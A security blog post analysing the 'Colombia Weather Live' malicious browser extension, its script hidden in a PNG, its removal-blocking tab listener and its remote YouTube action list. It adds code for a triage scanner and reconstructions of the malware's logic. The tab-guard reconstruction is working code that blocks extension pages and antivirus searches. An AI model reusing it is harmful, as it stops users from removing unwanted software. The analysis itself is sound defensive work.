Ominous “Live Weather” Browser Extension Manipulates Users’ Browsing

The “Colombia Weather Live” extension appeared on multiple browsers, including Google Chrome and Mozilla Firefox, and was downloaded by more than 10,000 users. In the video, we talked about the two main actions of the attack: using the infected browser to perform actions on YouTube in the background, and preventing users from removing the malicious extension from their computer.

Let’s look at how the extension is able to do this.

Code Analysis

When we unpack the extension, the first thing we see is that it requests unusual permissions from the user, such as access to storage, tabs, and all URLs, which let the code see exactly which sites a user visits. These are the two files responsible for setting off the infection:

  1. 1499654451774.js

At first, this looks like a plain copy of the jQuery JavaScript library, but malicious code is embedded in it. It operates in a very simple manner: when called, it loads a PNG image into the browser.

  2. 1499654451774_512.png

The image, loaded by the previous code, looks harmless. However, it carries malicious JavaScript that is executed when the image is loaded onto the page (see Figure 1).

Figure 1. PNG Image infected with malicious code
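The two observations above (a manifest asking for far more than a weather widget needs, and a PNG that carries script) are both cheap to check on an unpacked extension directory. The following is an added triage script, not code from the extension or from the original post. It parses the PNG chunk list and flags script-looking text in tEXt chunks or in bytes appended after IEND, and it lists manifest permissions worth a second look. The permission list, the script markers, the sample manifest and the two PNG byte strings are all constructed for the example; the post does not say exactly how the real image hides its code.

```javascript
// Added example (not code from the extension or the original post): triage an
// unpacked extension with the two checks from the analysis. The manifest and
// the PNG bytes below are constructed sample inputs, not files from the sample.

const PNG_SIG = Buffer.from([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a]);

// Permissions a weather widget has no business asking for (assumed list;
// "storage" is included because the post calls it out).
const BROAD_PERMISSIONS = new Set([
  "tabs", "storage", "<all_urls>", "*://*/*", "http://*/*", "https://*/*",
  "webRequest", "webRequestBlocking",
]);

// Strings that should never appear inside a weather icon (assumed markers).
const SCRIPT_MARKERS = /<script|\beval\s*\(|\batob\s*\(|\bFunction\s*\(|\bchrome\.|\bdocument\.|XMLHttpRequest/i;

// Return the manifest permissions that warrant a closer look.
function auditManifest(manifest) {
  const perms = [...(manifest.permissions || []), ...(manifest.host_permissions || [])];
  return perms.filter((p) => BROAD_PERMISSIONS.has(p));
}

// Walk the PNG chunk list (length, type, data, CRC) up to IEND and return the
// chunks plus whatever bytes follow IEND, which a well-formed image never has.
function parsePngChunks(buf) {
  if (!buf.subarray(0, 8).equals(PNG_SIG)) throw new Error("not a PNG");
  const chunks = [];
  let off = 8;
  while (off + 12 <= buf.length) {
    const len = buf.readUInt32BE(off);
    const type = buf.toString("latin1", off + 4, off + 8);
    chunks.push({ type, data: buf.subarray(off + 8, off + 8 + len) });
    off += 12 + len;
    if (type === "IEND") break;
  }
  return { chunks, trailing: buf.subarray(Math.min(off, buf.length)) };
}

// Report script-looking text in tEXt chunks (keyword\0text) and any data after
// IEND. Only tEXt is inspected; zTXt/iTXt payloads would need inflating first.
function scanPng(buf) {
  const { chunks, trailing } = parsePngChunks(buf);
  const findings = [];
  for (const c of chunks) {
    if (c.type !== "tEXt") continue;
    const nul = c.data.indexOf(0);
    const keyword = c.data.toString("latin1", 0, nul < 0 ? c.data.length : nul);
    const text = nul < 0 ? "" : c.data.toString("latin1", nul + 1);
    const m = SCRIPT_MARKERS.exec(text);
    if (m) findings.push({ where: `tEXt:${keyword}`, marker: m[0] });
  }
  if (trailing.length > 0) {
    const m = SCRIPT_MARKERS.exec(trailing.toString("latin1"));
    findings.push({ where: "after IEND", marker: m ? m[0] : null, bytes: trailing.length });
  }
  return findings;
}

// --- constructed sample inputs (CRC32 so the chunks are well-formed) ---
const CRC_TABLE = new Uint32Array(256).map((_, n) => {
  let c = n;
  for (let k = 0; k < 8; k++) c = c & 1 ? 0xedb88320 ^ (c >>> 1) : c >>> 1;
  return c >>> 0;
});
function crc32(buf) {
  let c = 0xffffffff;
  for (const b of buf) c = CRC_TABLE[(c ^ b) & 0xff] ^ (c >>> 8);
  return (c ^ 0xffffffff) >>> 0;
}
function pngChunk(type, data) {
  const len = Buffer.alloc(4); len.writeUInt32BE(data.length, 0);
  const body = Buffer.concat([Buffer.from(type, "latin1"), data]);
  const crc = Buffer.alloc(4); crc.writeUInt32BE(crc32(body), 0);
  return Buffer.concat([len, body, crc]);
}
const IHDR = Buffer.from([0, 0, 0, 1, 0, 0, 0, 1, 8, 2, 0, 0, 0]); // 1x1 RGB
const SAMPLE_MANIFEST = { name: "Colombia Weather Live", permissions: ["storage", "tabs", "<all_urls>"] };
const CLEAN_PNG = Buffer.concat([PNG_SIG, pngChunk("IHDR", IHDR), pngChunk("IEND", Buffer.alloc(0))]);
const TROJANED_PNG = Buffer.concat([
  PNG_SIG,
  pngChunk("IHDR", IHDR),
  pngChunk("tEXt", Buffer.from("Comment\0eval(atob('Li4u'))", "latin1")),
  pngChunk("IEND", Buffer.alloc(0)),
  Buffer.from("<script>chrome.tabs.query({}, function (t) {});</script>", "latin1"),
]);

console.log("permissions:", auditManifest(SAMPLE_MANIFEST));
console.log("clean png:", scanPng(CLEAN_PNG));
console.log("trojaned png:", scanPng(TROJANED_PNG));
```

Run it with Node against any `manifest.json` and image pulled from an unpacked `.crx`/`.xpi`; a finding of bytes after IEND is suspicious on its own, even when no marker matches, because image decoders stop at IEND and never look there.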

When that code runs, it requests the main payload, a file that is encrypted, as one would expect. However, with some modifications, we were able to decrypt the script and recover the actual code.

It is clear that the code was built strategically – the developer even included “Development” and “Production” configurations:

Figure 2. Dev and prod configurations

Moving ahead in the code, we find the starting point. It calls four separate functions, but we’re only going to focus on two:

Figure 3. Start point of the malicious code

initJsPagesInjecter

This function adds a listener to browser tabs, essentially checking everything a user attempts to access and blocking certain activities based on specific URLs and keywords.

This is the part of the code that makes the extension so difficult to remove. It blocks access to “chrome://extensions” as well as any searches related to anti-virus solutions, preventing users from finding information on how to remove the threat.
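To make the tab-guard pattern concrete, here is an added reconstruction of it, not the extension's own code and not taken from the post. The URL policy is a pure function so it can be run and tested outside a browser, and the `chrome` object is passed in so a fake API can exercise the listener. The blocked prefixes, search-engine hostnames and keyword list are assumptions; the post names “chrome://extensions” and anti-virus searches but does not reproduce the full lists.

```javascript
// Added example, not the extension's own code: a reconstruction of the
// tab-guard pattern described above. Lists below are assumptions.

// Pages the extension refuses to let the user reach.
const BLOCKED_PREFIXES = ["chrome://extensions", "about:addons"];

// Search engines whose query string is inspected (assumed hostnames).
const SEARCH_HOSTS = new Set(["www.google.com", "www.bing.com", "duckduckgo.com"]);

// Search terms treated as an attempt to find removal help (constructed list).
const SEARCH_KEYWORDS = ["antivirus", "anti-virus", "malware", "remove extension"];

// Decide whether a navigation target should be blocked.
function shouldBlock(rawUrl) {
  const lower = String(rawUrl).toLowerCase();
  if (BLOCKED_PREFIXES.some((p) => lower.startsWith(p))) return true;
  let url;
  try { url = new URL(rawUrl); } catch { return false; }
  if (!SEARCH_HOSTS.has(url.hostname)) return false;
  const query = (url.searchParams.get("q") || "").toLowerCase();
  return SEARCH_KEYWORDS.some((k) => query.includes(k));
}

// Register the listener. chrome.tabs.onUpdated only reports changeInfo.url to
// extensions holding the "tabs" permission, which is one reason the manifest
// asks for it. chromeApi is injected so the logic can be driven by a fake.
function installTabGuard(chromeApi, redirectTo) {
  chromeApi.tabs.onUpdated.addListener((tabId, changeInfo) => {
    if (changeInfo.url && shouldBlock(changeInfo.url)) {
      chromeApi.tabs.update(tabId, { url: redirectTo });
    }
  });
}

// Wire up for real only when running as an extension background script.
if (typeof chrome !== "undefined" && chrome.tabs) {
  installTabGuard(chrome, "about:blank");
}
```

From a response standpoint, the lists are the useful artefact: once they are recovered from the decrypted payload they tell you exactly which help pages and search terms the victim could not reach, and the guard only runs while the extension is loaded, so it does not stop removal from outside the browser profile (for example by deleting the extension directory or applying an enterprise install blocklist).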

initMiner

This function initializes some variables and calls init, which in turn downloads an encrypted JSON file containing instructions for the actions the script will take.

Figure 4. Snippet of a decrypted “Actions” file

When we decrypt the downloaded file, we can see the three fields that each action contains:

  • _id: Action identifier, used in the activity log for control;
  • type: Type of the action;
  • data: Data required to perform the action.

This large list is consumed by the “handleActionsType” function, which dispatches on the action type:

Figure 5. The function that handles the actions.

In this version of the extension, there are calls for these actions:

  • YouTube video rate;
  • YouTube channel subscribe;
  • YouTube comment rate up;
  • YouTube video watch.
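The tasking loop behind initMiner and handleActionsType, as an added reconstruction that is not the extension's own code. The field names _id, type and data come from the analysis above; the type strings, the data each type needs, and the sample action list are assumptions. Handlers only describe the YouTube interaction they would perform; nothing is sent. The example also shows how the activity log keyed on _id keeps a re-downloaded list from repeating an action, and how an action type the current build does not know (here a hypothetical redirect) is simply rejected, which is the versatility the conclusion warns about.

```javascript
// Added example, not the extension's own code: a reconstruction of the
// action-dispatch pattern described above. Type names and data fields are assumed.

// What each action type needs in its data object (assumed schema).
const ACTION_SCHEMA = {
  yt_video_rate:        { required: ["videoId", "rating"], allowed: { rating: ["like", "dislike"] } },
  yt_channel_subscribe: { required: ["channelId"] },
  yt_comment_rate_up:   { required: ["videoId", "commentId"] },
  yt_video_watch:       { required: ["videoId", "seconds"] },
};

// Validate one action against the schema; return a reason string or null.
function validateAction(action) {
  if (!action || typeof action !== "object") return "not an object";
  if (typeof action._id !== "string" || !action._id) return "missing _id";
  const schema = ACTION_SCHEMA[action.type];
  if (!schema) return `unknown type ${action.type}`;
  if (!action.data || typeof action.data !== "object") return "missing data";
  for (const f of schema.required) if (!(f in action.data)) return `missing data.${f}`;
  for (const [f, vals] of Object.entries(schema.allowed || {})) {
    if (!vals.includes(action.data[f])) return `bad data.${f}`;
  }
  return null;
}

// Human-readable description of the YouTube interaction an action asks for.
function describeTarget(action) {
  const d = action.data;
  switch (action.type) {
    case "yt_video_rate": return `${d.rating} video ${d.videoId}`;
    case "yt_channel_subscribe": return `subscribe to channel ${d.channelId}`;
    case "yt_comment_rate_up": return `upvote comment ${d.commentId} on ${d.videoId}`;
    case "yt_video_watch": return `watch ${d.videoId} for ${d.seconds}s`;
    default: return "unknown";
  }
}

// Run a decrypted action list. activityLog plays the role of the malware's
// log: an _id already in it is not repeated, so a bot that fetches the same
// list twice does not like the same video twice.
function handleActionsType(actions, activityLog = new Set()) {
  const executed = [];
  const rejected = [];
  for (const action of actions) {
    const why = validateAction(action);
    if (why) { rejected.push({ _id: action && action._id, why }); continue; }
    if (activityLog.has(action._id)) { rejected.push({ _id: action._id, why: "already done" }); continue; }
    activityLog.add(action._id);
    executed.push({ _id: action._id, type: action.type, target: describeTarget(action) });
  }
  return { executed, rejected };
}

// Constructed sample, shaped like the decrypted "Actions" file in Figure 4.
const SAMPLE_ACTIONS = [
  { _id: "a1", type: "yt_video_rate", data: { videoId: "vid001", rating: "like" } },
  { _id: "a2", type: "yt_channel_subscribe", data: { channelId: "chan001" } },
  { _id: "a3", type: "yt_comment_rate_up", data: { videoId: "vid001", commentId: "c9" } },
  { _id: "a4", type: "yt_video_watch", data: { videoId: "vid001", seconds: 30 } },
  { _id: "a5", type: "yt_video_rate", data: { videoId: "vid002", rating: "meh" } },  // bad rating value
  { _id: "a6", type: "yt_redirect", data: { url: "https://example.invalid/" } },     // type this build lacks
  { _id: "a1", type: "yt_video_rate", data: { videoId: "vid001", rating: "like" } },  // duplicate _id
];

console.log(JSON.stringify(handleActionsType(SAMPLE_ACTIONS), null, 2));
```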

Conclusion

The code in this extension is not currently written to cause any lasting harm to users. However, the code was written to be versatile and adaptable, meaning that it would be possible to change its functions without too much extra effort. This is dangerous, as it could be programmed to perform acts such as redirection to phishing sites, credential harvesting, and more. The consequences of a malicious extension with those abilities would be much more severe – compromise of sensitive data, financial loss, and reputational damage to companies being impersonated by fake, malicious extensions, just to name a few.

It is important for organizations to take steps to protect their brand online. The Chrome Web Store took 3 weeks to recognize “Colombia Weather Live” as malicious, and it was downloaded by many users during that time. If your organization is impersonated by a malicious extension, it is you, your users, and your reputation at risk.

